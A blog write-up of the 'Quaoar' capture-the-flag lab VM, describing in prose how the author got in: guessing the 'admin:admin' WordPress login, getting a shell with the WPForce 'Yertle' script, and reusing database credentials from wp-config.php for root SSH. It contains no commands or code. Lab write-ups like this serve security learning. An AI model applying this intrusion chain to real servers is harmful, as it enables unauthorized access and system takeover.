Hackin n Crackin – “Quaoar”

So since I’ve got a little time off from work, I figured it would be a good time to do a CTF/Boot2Root. This one, “Quaoar“, is the 1st in a series by Viper called “Hackfest2016”. I’ll dig through the other two probably later this week.

First things first let’s get this thing fired up. I downloaded the .ova and opened it in VMware.

Q-BootIt appears to have a static IP, so that at least saves me the hassle of having to scan around to find it. I did a quick ping to make sure it was alive, and after a good response I kicked off a quick Nmap scan to see what I’m working with.

K-Scan1Looks like I’ve got an OpenSSH server, DNS, an Apache server, a mail server on a few different ports, Samba, and it’s probably running Linux. Great! Plenty of info to get me going.

Whenever I see web servers I always like to start there. So I hop on over through my browser and am greeted with the following images:

Really nothing of note here, although I enjoyed the joke ;). A quick look at the HTML doesn’t reveal anything I care about either.

K-WebsiteHTML

So next I’ll always check out the robots.txt file and see if there’s anything interesting…

K-RobotsNice! I can see it’s probably running WordPress. After a bit of browsing I land on /wp-login/ where I’m prompted with a login screen. I spray it with the usual horribly insecure username/password combos and get a bite with “admin:admin“. We’re in!

I’ve got admin access to the website now, but I want more than that. Typically here I’d use MSFVENOM to create a reverse tcp PHP file and upload that as a plugin. But, I’m a lazy hacker and I found an awesome tool recently that does all the work for me! A guy by the name of “n00py” has an awesome toolset out on GitHub called “WPForce”; part of that toolset is a python script called “Yertle” that makes the process of getting a shell a whole lot faster. I grabbed his script, loaded it up, and in seconds had my shell to the box.

YertleShell2

I always tell people “one is none and two is one”, so now I’ve got my second way to get at this machine. Once I drop into the shell I look around and take stock of who I am and where I’m at.

shellLookingAround

Looking through what’s available to me, that WordPress directory looked interesting. So I drop in and take a look.

lsWordpress

After digging around a bit in here I finally started going through “wp-config.php“, where I started to find some interesting things. Inside that file I find that there’s credentials for a MySQL database.

configCreds

Seeing as password security hasn’t been this box’s strong suit I decided to open another terminal and see if these might be the root users credentials as well…

rootSSH

Winner winner!! Again I do some basic checks to see what’s around me and voila, flag.txt is sitting right there. After a quick search for any more files, I was able to find the 2nd flag in /home/wpadmin.

Post Remarks

All in all it was a fun box to break. The common theme of weak passwords definitely does mirror real life scenarios since there are plenty of admins out there that practice terrible password security. I’m excited to check out the next box in the series and see how Viper ups the difficulty!

Until next time….

-DarkHorseSec

OwnedFinal

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s